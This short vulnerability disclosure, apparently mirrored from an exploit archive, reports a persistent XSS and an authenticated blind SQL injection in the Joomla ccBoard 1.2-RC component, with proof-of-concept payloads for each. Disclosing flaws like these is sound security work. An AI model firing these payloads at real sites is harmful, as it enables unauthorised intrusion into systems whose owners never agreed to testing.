# Exploit Title: Joomla Component com_ccboard Multiple Vulnerabilities # Date: 13 Nov 2010 # Author: jdc # Category: webapps/0day # Version: 1.2-RC # Download: http://codeclassic.org/the-downloads/joomla-extensionscomponents/292-ccboard-bulletin-board-forum.html Persistent XSS -------------- ccBoard doesn't filter its posts for HTML... at all: <script>prompt(1)</script> Blind SQL Injection ------------------- NOTE: must be logged in ?option=com_ccboard &view=myprofile &cid=63 and benchmark(5000000,md5(1))
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论